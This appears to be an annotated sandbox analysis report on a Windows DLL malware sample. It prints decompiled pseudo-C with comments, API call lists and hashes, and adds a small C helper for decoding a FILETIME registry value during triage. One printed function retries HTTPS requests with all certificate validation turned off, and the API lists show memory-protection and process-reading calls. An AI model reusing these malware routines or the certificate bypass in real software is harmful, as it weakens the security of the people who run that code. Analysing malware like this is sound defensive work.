                                                            						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                                                            						if(_t76 >= 0) {
                                                            							_t76 = E00DD609E(_a4);
                                                            							if(_t76 >= 0) {
                                                            								_t65 = _a28;
                                                            								if(_t65 != 0 &&  *_t65 == 0) {
                                                            									_t50 = _a4;
                                                            									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                                                            								}
                                                            							}
                                                            						}
                                                            						_t45 = _a4;
                                                            						if(_t45 != 0) {
                                                            							 *((intOrPtr*)( *_t45 + 8))(_t45);
                                                            						}
                                                            						_t57 = __imp__#6;
                                                            						if(_a20 != 0) {
                                                            							 *_t57(_a20);
                                                            						}
                                                            						if(_a12 != 0) {
                                                            							 *_t57(_a12);
                                                            						}
                                                            					}
                                                            				}
                                                            				_t41 = _v8;
                                                            				 *((intOrPtr*)( *_t41 + 8))(_t41);
                                                            				goto L18;
                                                            			}

                                                            APIs
                                                              • Part of subcall function 00DD56E3: SysAllocString.OLEAUT32(80000002), ref: 00DD573A
                                                              • Part of subcall function 00DD56E3: SysFreeString.OLEAUT32(00000000), ref: 00DD579F
                                                            • SysFreeString.OLEAUT32(?), ref: 00DD1996
                                                            • SysFreeString.OLEAUT32(00DD5BA8), ref: 00DD19A0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: String$Free$Alloc
                                                            • String ID:
                                                            • API String ID: 986138563-0
                                                            • Opcode ID: 018ae83b18585d7a55aeb6dc4d4fe098ba05b2783c11a389f66ff3fc1b87a7d6
                                                            • Instruction ID: 107b6e2a517ff007e3dc1a792e72dc89b06db5471e4ec7762bb2c1680b630deb
                                                            • Opcode Fuzzy Hash: 018ae83b18585d7a55aeb6dc4d4fe098ba05b2783c11a389f66ff3fc1b87a7d6
                                                            • Instruction Fuzzy Hash: F5314876900119BFCB21DF69C8A8C9BBB79FFC9740714465AF8169B210D232ED51CBB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 50%
                                                            			E00DD2AA4(intOrPtr* __eax, intOrPtr _a4) {
                                                            				void* _v8;
                                                            				void* _v12;
                                                            				void* _v16;
                                                            				intOrPtr* _t22;
                                                            				void* _t23;
                                                            				intOrPtr* _t24;
                                                            				intOrPtr* _t26;
                                                            				intOrPtr* _t28;
                                                            				intOrPtr* _t30;
                                                            				void* _t31;
                                                            				intOrPtr* _t32;
                                                            				intOrPtr _t42;
                                                            				intOrPtr _t45;
                                                            				intOrPtr _t48;
                                                            				void* _t51;
                                                            
                                                            				_push( &_v16);
                                                            				_t42 =  *0xdda2d4; // 0x2bed5a8
                                                            				_t2 = _t42 + 0xddb468; // 0x20400
                                                            				_push(0);
                                                            				_push(__eax);
                                                            				_t51 =  *((intOrPtr*)( *__eax + 0x3c))();
                                                            				if(_t51 >= 0) {
                                                            					_t22 = _v16;
                                                            					_t45 =  *0xdda2d4; // 0x2bed5a8
                                                            					_t6 = _t45 + 0xddb488; // 0xe7a1af80
                                                            					_t23 =  *((intOrPtr*)( *_t22))(_t22, _t6,  &_v12); // executed
                                                            					_t51 = _t23;
                                                            					if(_t51 >= 0) {
                                                            						_t26 = _v12;
                                                            						_t51 =  *((intOrPtr*)( *_t26 + 0x1c))(_t26,  &_v8);
                                                            						if(_t51 >= 0) {
                                                            							_t48 =  *0xdda2d4; // 0x2bed5a8
                                                            							_t30 = _v8;
                                                            							_t12 = _t48 + 0xddb478; // 0xa4c6892c
                                                            							_t31 =  *((intOrPtr*)( *_t30))(_t30, _t12, _a4); // executed
                                                            							_t51 = _t31;
                                                            							_t32 = _v8;
                                                            							 *((intOrPtr*)( *_t32 + 8))(_t32);
                                                            						}
                                                            						_t28 = _v12;
                                                            						 *((intOrPtr*)( *_t28 + 8))(_t28);
                                                            					}
                                                            					_t24 = _v16;
                                                            					 *((intOrPtr*)( *_t24 + 8))(_t24);
                                                            				}
                                                            				return _t51;
                                                            			}

                                                            APIs
                                                            • IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 00DD2AE1
                                                            • IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 00DD2B12
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: Interface_ProxyQueryUnknown_
                                                            • String ID:
                                                            • API String ID: 2522245112-0
                                                            • Opcode ID: 42770c5ae35e70b8daa0ccc959ef44d2863483afd98a76effcfe34c5bfc52381
                                                            • Instruction ID: 47199d730b280b21977778dc82c0fac1cbef56fab32ee7a0e5bf22a702198d13
                                                            • Opcode Fuzzy Hash: 42770c5ae35e70b8daa0ccc959ef44d2863483afd98a76effcfe34c5bfc52381
                                                            • Instruction Fuzzy Hash: 56217275A01609EFCB00CFA4C848D9AB779EF88714B108685ED05DB315D731ED01CBB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            • EnumProcessModules.PSAPI(00000008,00000000,00001000,00000000,00001000,0458B7A0,-0000000C,00000000,00000000), ref: 045828E5
                                                            • GetLastError.KERNEL32(00000008,00000000,00001000,00000000,00001000,0458B7A0,-0000000C,00000000), ref: 0458292C
                                                              • Part of subcall function 04583C4A: RtlFreeHeap.NTDLL(00000000,?,045630B5,00000000,?,00000104,04580BF9,?,00000250,?,00000000), ref: 04583C56
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$AllocateEnumErrorFreeLastModulesProcess
                                                            • String ID:
                                                            • API String ID: 552344955-0
                                                            • Opcode ID: dcd5c3f00f2f0ffadd9bd5dbafc9f31ba826dbed4f63bff3cc31eaaf9c928d8f
                                                            • Instruction ID: 281b66b5b5d6023f1c702f2b3313258e9049526cfb3a344e16d34b8815a9d89c
                                                            • Opcode Fuzzy Hash: dcd5c3f00f2f0ffadd9bd5dbafc9f31ba826dbed4f63bff3cc31eaaf9c928d8f
                                                            • Instruction Fuzzy Hash: E411A071900209ABDB11BFA9E844BAEBBB8FF90B54F10409DF800B7240DF75AA45AB54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 00DD29B1
                                                              • Part of subcall function 00DD18B7: SysFreeString.OLEAUT32(?), ref: 00DD1996
                                                            • SafeArrayDestroy.OLEAUT32(?), ref: 00DD29FE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: ArraySafe$CreateDestroyFreeString
                                                            • String ID:
                                                            • API String ID: 3098518882-0
                                                            • Opcode ID: 891870843384f609977f0b42b291f6cef6bf818ead273d2047d7e026e6c8478f
                                                            • Instruction ID: 740e2c9b0878cfd33e91d97a4e16cd0575281f9bcf10453693f76e7f06359e7a
                                                            • Opcode Fuzzy Hash: 891870843384f609977f0b42b291f6cef6bf818ead273d2047d7e026e6c8478f
                                                            • Instruction Fuzzy Hash: FF115272900209BFDF11DF94CD45AEEBBB8EF14710F018066FA04E6261E3759A15DBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00DD3D26(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
                                                            				struct _FILETIME _v12;
                                                            				signed int _t11;
                                                            				void* _t15;
                                                            				void* _t20; // Win32 error code returned to the caller, 0 on success
                                                            				void* _t22;
                                                            				void* _t23; // wide-char copy of _a12 on the module's private heap
                                                            				signed short* _t24; // pointer to wide character _a16 inside that copy
                                                            
                                                            				_t22 = __edx;
                                                            				// E00DD5691 (lstrlen/mbstowcs/memset in the API list below) converts the ANSI string _a12 to a fresh wide-char copy
                                                            				_t23 = E00DD5691(_t11, _a12);
                                                            				if(_t23 == 0) {
                                                            					_t20 = 8; // ERROR_NOT_ENOUGH_MEMORY
                                                            				} else {
                                                            					// cut the string at index _a16 so the callee only sees the prefix
                                                            					_t24 = _t23 + _a16 * 2;
                                                            					 *_t24 =  *_t24 & 0x00000000; // executed
                                                            					_t15 = E00DD6CF1(__ecx, _a4, _a8, _t23); // executed
                                                            					_t20 = _t15;
                                                            					if(_t20 == 0) {
                                                            						GetSystemTimeAsFileTime( &_v12);
                                                            						// restore the cut position as '_' (0x5f): the full string with '_' at index _a16 is passed on together with the
                                                            						// 8-byte FILETIME; 0x80000001 is HKEY_CURRENT_USER, consistent with E00DD2A18 storing the timestamp as an
                                                            						// 8-byte value under HKCU (E00DD2A18 itself is not listed in this section)
                                                            						 *_t24 = 0x5f;
                                                            						_t20 = E00DD2A18(_t22, _a4, 0x80000001, _a8, _t23,  &_v12, 8);
                                                            					}
                                                            					HeapFree( *0xdda290, 0, _t23); // the heap handle lives at 0xdda290, next to the attach counter at 0xdda294
                                                            				}
                                                            				return _t20;
                                                            			}










                                                            Statement addresses, in listing order: 0x00dd3d26, 0x00dd3d37, 0x00dd3d3b, 0x00dd3d94, 0x00dd3d3d, 0x00dd3d44, 0x00dd3d4a, 0x00dd3d4e, 0x00dd3d53, 0x00dd3d57, 0x00dd3d5d, 0x00dd3d6d, 0x00dd3d7f, 0x00dd3d7f, 0x00dd3d8a, 0x00dd3d8a, 0x00dd3d9b
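The function above captures the current time with GetSystemTimeAsFileTime and passes the 8-byte result on together with the HKEY_CURRENT_USER constant (0x80000001). The following C helpers are an added example, not code from the sample or from this report: they decode such an 8-byte FILETIME blob when it is recovered from a registry value during triage (a FILETIME is a little-endian 64-bit count of 100 ns ticks since 1601-01-01 UTC), and rebuild the value name with the '_' substitution the decompiled code performs. That E00DD2A18 writes a registry value is this example's assumption, the function names are its own, and the sample blob is constructed.

```c
/* Added example (not code from the sample or the report): decoding the 8-byte
 * FILETIME value E00DD3D26 captures, and rebuilding the value name it derives.
 * Assumption: the callee stores the value under HKCU as 8 bytes of REG_BINARY. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <time.h>

#define EPOCH_DIFF_100NS 116444736000000000ULL  /* ticks from 1601-01-01 to 1970-01-01 */

/* Little-endian 8 bytes as stored in the registry -> 64-bit FILETIME. */
uint64_t filetime_from_bytes(const uint8_t b[8])
{
    uint64_t v = 0;
    for (int i = 7; i >= 0; i--) v = (v << 8) | b[i];
    return v;
}

void filetime_to_bytes(uint64_t ft, uint8_t out[8])
{
    for (int i = 0; i < 8; i++) out[i] = (uint8_t)(ft >> (8 * i));
}

/* Seconds since the Unix epoch, or -1 for a value before 1970: not a plausible
 * "current time", and usually a sign the 8 bytes are not a FILETIME at all. */
int64_t filetime_to_unix(uint64_t ft)
{
    if (ft < EPOCH_DIFF_100NS) return -1;
    return (int64_t)((ft - EPOCH_DIFF_100NS) / 10000000ULL);
}

uint64_t unix_to_filetime(int64_t t)
{
    return (uint64_t)t * 10000000ULL + EPOCH_DIFF_100NS;
}

/* "YYYY-MM-DD HH:MM:SS" in UTC; returns 1 on success. */
int format_utc(int64_t t, char *buf, size_t buflen)
{
    time_t tt = (time_t)t;
    struct tm *tm = gmtime(&tt);
    if (tm == NULL) return 0;
    return strftime(buf, buflen, "%Y-%m-%d %H:%M:%S", tm) != 0;
}

/* Value name as E00DD3D26 builds it: the input with the character at index idx
 * replaced by '_' (0x5f). idx must lie inside the string. */
int make_value_name(const char *in, size_t idx, char *out, size_t outlen)
{
    size_t n = strlen(in);
    if (idx >= n || n + 1 > outlen) return 0;
    memcpy(out, in, n + 1);
    out[idx] = '_';
    return 1;
}

int main(void)
{
    /* Constructed input: FILETIME 0x01D7B97BF0A24000 (2021-10-05 00:00:00 UTC)
     * laid out little-endian, as it would sit in an 8-byte REG_BINARY value. */
    const uint8_t blob[8] = { 0x00, 0x40, 0xA2, 0xF0, 0x7B, 0xB9, 0xD7, 0x01 };
    char ts[32], name[32];
    int64_t unix_secs = filetime_to_unix(filetime_from_bytes(blob));
    format_utc(unix_secs, ts, sizeof ts);
    make_value_name("abcdef", 3, name, sizeof name);
    printf("%lld -> %s UTC, value name %s\n", (long long)unix_secs, ts, name);
    return 0;
}
```

A value that decodes to a date close to the sandbox run (2021 for this report) confirms the interpretation; a value far outside that range is not this timestamp.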

                                                            APIs
                                                              • Part of subcall function 00DD5691: lstrlen.KERNEL32(?,00000000,039C9D00,745EC740,00DD291A,039C9F05,00DD5FB9,00DD5FB9,?,00DD5FB9,?,69B25F44,E8FA7DD7,00000000), ref: 00DD5698
                                                              • Part of subcall function 00DD5691: mbstowcs.NTDLL ref: 00DD56C1
                                                              • Part of subcall function 00DD5691: memset.NTDLL ref: 00DD56D3
                                                            • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,73B75520,00000008,00000014,004F0053,039C930C), ref: 00DD3D5D
                                                            • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,73B75520,00000008,00000014,004F0053,039C930C), ref: 00DD3D8A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                                                            • String ID:
                                                            • API String ID: 1500278894-0
                                                            • Opcode ID: 82dfa99aaf6c83b34c450c59071ee6400b827cca98d5b2c8fe73678597c9c7d1
                                                            • Instruction ID: b3b02199b07e8c55d91f03596d79171f9593393bbcee8e3fd3ed6a3a77315e85
                                                            • Opcode Fuzzy Hash: 82dfa99aaf6c83b34c450c59071ee6400b827cca98d5b2c8fe73678597c9c7d1
                                                            • Instruction Fuzzy Hash: B801A232100209BBDB215F58DC45F9A7F79FB84710F104026FE44AA265EB71D924DB71
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SysAllocString.OLEAUT32(00DD462D), ref: 00DD5AA7
                                                              • Part of subcall function 00DD18B7: SysFreeString.OLEAUT32(?), ref: 00DD1996
                                                            • SysFreeString.OLEAUT32(00000000), ref: 00DD5AE7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: String$Free$Alloc
                                                            • String ID:
                                                            • API String ID: 986138563-0
                                                            • Opcode ID: 3bbba4a55bf9601347f04eb321e0a2e97e30ea593ec052658634c9ae64737544
                                                            • Instruction ID: b5d00f71423e98f68462340ef082b7b9b05adc475b1a9fe64be8f55cc7150288
                                                            • Opcode Fuzzy Hash: 3bbba4a55bf9601347f04eb321e0a2e97e30ea593ec052658634c9ae64737544
                                                            • Instruction Fuzzy Hash: 73018F3250161ABBCB109FA8DC048AFBBB8EF44310B014022F905E6220E771AA149BB1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RtlEnterCriticalSection.NTDLL(0458C300), ref: 0456CFC4
                                                            • RtlLeaveCriticalSection.NTDLL(0458C300), ref: 0456D000
                                                              • Part of subcall function 04562577: lstrlen.KERNEL32(?,?,00000000,?,04578E6F,00000000,00000001,?,00000000,00000000,00000000,0458B928,00000001), ref: 045625C4
                                                              • Part of subcall function 04562577: VirtualProtect.KERNELBASE(00000000,00000000,00000040,00000200,?,00000000,?,04578E6F,00000000,00000001,?,00000000,00000000,00000000,0458B928,00000001), ref: 045625D6
                                                              • Part of subcall function 04562577: lstrcpy.KERNEL32(00000000,?), ref: 045625E5
                                                              • Part of subcall function 04562577: VirtualProtect.KERNELBASE(00000000,00000000,00000200,00000200,?,00000000,?,04578E6F,00000000,00000001,?,00000000,00000000,00000000,0458B928,00000001), ref: 045625F6
                                                              • Part of subcall function 04583C4A: RtlFreeHeap.NTDLL(00000000,?,045630B5,00000000,?,00000104,04580BF9,?,00000250,?,00000000), ref: 04583C56
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CriticalProtectSectionVirtual$EnterFreeHeapLeavelstrcpylstrlen
                                                            • String ID:
                                                            • API String ID: 1872894792-0
                                                            • Opcode ID: 73dd2789e427f0c86089c0183b09708fc1eb42cf9328ef4f0ce111f5bc06d54b
                                                            • Instruction ID: 871ef1da27a4998db6c80560d7df9a026a86b4b6e6c8ae09bfb505fcd7342579
                                                            • Opcode Fuzzy Hash: 73dd2789e427f0c86089c0183b09708fc1eb42cf9328ef4f0ce111f5bc06d54b
                                                            • Instruction Fuzzy Hash: 2CF0EC762011159B87317F58A484C39F798FB85515315024EE95777300CE627C01E690
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • InterlockedIncrement.KERNEL32(0458BFFC), ref: 045626F7
                                                              • Part of subcall function 04561305: GetSystemTimeAsFileTime.KERNEL32(?), ref: 04561330
                                                              • Part of subcall function 04561305: HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 0456133D
                                                              • Part of subcall function 04561305: NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 045613C9
                                                              • Part of subcall function 04561305: GetModuleHandleA.KERNEL32(00000000), ref: 045613D4
                                                              • Part of subcall function 04561305: RtlImageNtHeader.NTDLL(00000000), ref: 045613DD
                                                              • Part of subcall function 04561305: RtlExitUserThread.NTDLL(00000000), ref: 045613F2
                                                            • InterlockedDecrement.KERNEL32(0458BFFC), ref: 0456271B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: InterlockedThreadTime$CreateDecrementExitFileHandleHeaderHeapImageIncrementInformationModuleQuerySystemUser
                                                            • String ID:
                                                            • API String ID: 1011034841-0
                                                            • Opcode ID: 199b61b0e9173f2282575fbdfb2b22385cc9f0b5b12864595f147d62520c86c9
                                                            • Instruction ID: b98ff37c9384e250cab44afe8a1fb81cc047a9f0e9b3648b05b27c19c1a546f7
                                                            • Opcode Fuzzy Hash: 199b61b0e9173f2282575fbdfb2b22385cc9f0b5b12864595f147d62520c86c9
                                                            • Instruction Fuzzy Hash: ACE01A322052229797327EB5A888F6AA756FB54AC2F00495CF483E2050EE20F844FE92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                            				// DLL entry point: _a4 is the module handle, _a8 the reason (1 = DLL_PROCESS_ATTACH, 0 = DLL_PROCESS_DETACH)
                                                            				intOrPtr _t4;
                                                            				void* _t10;
                                                            				signed int _t11;
                                                            				void* _t13;
                                                            
                                                            				_t13 = 1; // return TRUE unless one-time initialisation fails
                                                            				_t4 = _a8;
                                                            				if(_t4 == 0) {
                                                            					// DLL_PROCESS_DETACH: tear down (E00DD38BC) once the attach counter at 0xdda294 drops to zero
                                                            					if(InterlockedDecrement(0xdda294) == 0) {
                                                            						E00DD38BC();
                                                            					}
                                                            				} else {
                                                            					// DLL_PROCESS_ATTACH: initialise on the first attach only; E00DD6632 creates the 4 MB growable private heap
                                                            					// (HeapCreate(0, 0x400000, 0) in the API list below) that the other functions allocate from
                                                            					if(_t4 == 1 && InterlockedIncrement(0xdda294) == 1) {
                                                            						_t10 = E00DD6632(_t11, _a4); // executed
                                                            						if(_t10 != 0) {
                                                            							_t13 = 0; // non-zero is an error code: return FALSE so the load fails
                                                            						}
                                                            					}
                                                            				}
                                                            				return _t13;
                                                            			}







                                                            Statement addresses, in listing order: 0x00dd6962, 0x00dd6963, 0x00dd6966, 0x00dd6998, 0x00dd699a, 0x00dd699a, 0x00dd6968, 0x00dd6969, 0x00dd697e, 0x00dd6985, 0x00dd6987, 0x00dd6987, 0x00dd6985, 0x00dd6969, 0x00dd69a2

                                                            APIs
                                                            • InterlockedIncrement.KERNEL32(00DDA294), ref: 00DD6970
                                                              • Part of subcall function 00DD6632: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 00DD6647
                                                            • InterlockedDecrement.KERNEL32(00DDA294), ref: 00DD6990
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: Interlocked$CreateDecrementHeapIncrement
                                                            • String ID:
                                                            • API String ID: 3834848776-0
                                                            • Opcode ID: 973dec8710dd634fd8767159ed3c9b14d6841e96b7bf2cc4b09b9c7337128a94
                                                            • Instruction ID: 2553381798fc5b0def90ebccaba455d9dbd2137f12692b3c94c15e3186c34e71
                                                            • Opcode Fuzzy Hash: 973dec8710dd634fd8767159ed3c9b14d6841e96b7bf2cc4b09b9c7337128a94
                                                            • Instruction Fuzzy Hash: D6E04F352842325B87316B799C3476EFB549B10B80B08B417B489D13ACC631EC408AF2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 0457B94E: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 0457B987
                                                              • Part of subcall function 0457B94E: VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 0457B9BD
                                                              • Part of subcall function 0457B94E: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0457B9C9
                                                              • Part of subcall function 0457B94E: lstrcmpi.KERNEL32(?,00000000), ref: 0457BA06
                                                              • Part of subcall function 0457B94E: StrChrA.SHLWAPI(?,0000002E), ref: 0457BA0F
                                                              • Part of subcall function 0457B94E: lstrcmpi.KERNEL32(?,00000000), ref: 0457BA21
                                                              • Part of subcall function 0457B94E: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0457BA72
                                                            • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,00000010,?,?,?,045885A0,0000002C,04569E85,049B8E6E,?,00000000,0457765C), ref: 045615FC
                                                              • Part of subcall function 04566EB0: GetProcAddress.KERNEL32(?,00000000), ref: 04566ED9
                                                              • Part of subcall function 04566EB0: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,04569375,00000000,00000000,00000028,00000100), ref: 04566EFB
                                                            • VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,045885A0,0000002C,04569E85,049B8E6E,?,00000000,0457765C,?,00000318), ref: 04561687
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Virtual$AllocFree$lstrcmpi$AddressMemory64ProcReadWow64
                                                            • String ID:
                                                            • API String ID: 4138075514-0
                                                            • Opcode ID: 8fc2187f19a062337085d6058731c2e3b66571d83079152d7506e99b093c06b1
                                                            • Instruction ID: 08652e607c1bffe139b244b13d61d5f5fe3a6606b85f243d7d2e01cf3add71db
                                                            • Opcode Fuzzy Hash: 8fc2187f19a062337085d6058731c2e3b66571d83079152d7506e99b093c06b1
                                                            • Instruction Fuzzy Hash: CF210F75D01229EBCF119FA5DC80AEEBBB4FF08724F14812AE915B2250D7346A41EFA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 32%
                                                            			E00DD2566(intOrPtr _a4, signed int _a8) {
                                                            				// Send loop around an imported 7-argument send routine. The import is unresolved in this dump, but the argument
                                                            				// shape, the 0x2fxx error codes and option 0x1f all match WinHTTP's WinHttpSendRequest / WinHttpSetOption.
                                                            				long _v8;   // last error, returned to the caller (0 on success)
                                                            				long _v12;  // set once certificate checking has been relaxed, so that retry happens at most once
                                                            				char _v16;  // 4-byte option value handed to the set-option import
                                                            				void* _t14;
                                                            				long _t15;
                                                            				char* _t17;
                                                            				intOrPtr* _t19;
                                                            				signed int _t22;
                                                            
                                                            				_t19 = __imp__; // 0x6f54e700
                                                            				// neg/sbb idiom (the decompiler renders the neg as ~): _t22 becomes -1 when _a8, the header string, is non-NULL,
                                                            				// else 0. As a WinHTTP header length, -1 means "NUL-terminated, compute the length".
                                                            				_t22 =  ~_a8;
                                                            				_v12 = 0;
                                                            				asm("sbb esi, esi");
                                                            				while(1) {
                                                            					_v8 = 0;
                                                            					_t14 =  *_t19(_a4, _a8, _t22, 0, 0, 0, 0); // executed
                                                            					if(_t14 != 0) {
                                                            						break; // sent: return 0
                                                            					}
                                                            					_t15 = GetLastError();
                                                            					_v8 = _t15;
                                                            					if(_t15 != 0x2f8f) { // 0x2f8f = 12175 = ERROR_WINHTTP_SECURE_FAILURE: certificate / TLS validation failed
                                                            						if(_t15 == 0x2f00) { // 0x2f00 = 12032 = ERROR_WINHTTP_RESEND_REQUEST: simply send again
                                                            							continue;
                                                            						}
                                                            					} else {
                                                            						// On a TLS validation failure, relax the checks and retry once. 0x1f = WINHTTP_OPTION_SECURITY_FLAGS;
                                                            						// 0x3300 = SECURITY_FLAG_IGNORE_UNKNOWN_CA | SECURITY_FLAG_IGNORE_CERT_WRONG_USAGE |
                                                            						// SECURITY_FLAG_IGNORE_CERT_CN_INVALID | SECURITY_FLAG_IGNORE_CERT_DATE_INVALID, i.e. any server
                                                            						// certificate is accepted on this request handle from then on.
                                                            						_v16 = 0x3300;
                                                            						if(_v12 == 0) {
                                                            							_t17 =  &_v16;
                                                            							__imp__(_a4, 0x1f, _t17, 4);
                                                            							if(_t17 == 0) {
                                                            								_v8 = GetLastError();
                                                            							} else {
                                                            								_v12 = 1;
                                                            								continue;
                                                            							}
                                                            						}
                                                            					}
                                                            					L9:
                                                            					return _v8; // any other error, or a second secure failure, is returned unchanged
                                                            				}
                                                            				goto L9;
                                                            			}











                                                            Statement addresses, in listing order (entries the decompiler emitted as 0x00000000 omitted): 0x00dd256d, 0x00dd257a, 0x00dd257c, 0x00dd257f, 0x00dd25c4, 0x00dd25cc, 0x00dd25d2, 0x00dd25d6, 0x00dd2583, 0x00dd258e, 0x00dd2591, 0x00dd25c2, 0x00dd2593, 0x00dd2596, 0x00dd259d, 0x00dd25a1, 0x00dd25aa, 0x00dd25b2, 0x00dd25e0, 0x00dd25b4, 0x00dd25b4, 0x00dd25b4, 0x00dd25b2, 0x00dd259d, 0x00dd25e3, 0x00dd25ea, 0x00dd25ea

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: ErrorLast
                                                            • String ID:
                                                            • API String ID: 1452528299-0
                                                            • Opcode ID: 14295a1fb0d3049bb849c58991e54a4b0fcba60db3cabfb74c84a3764258e3d7
                                                            • Instruction ID: 943f2d72cb21261cc8e57aa4d8ec0cbc71fe0fce247f0bef9786c6387259c1f2
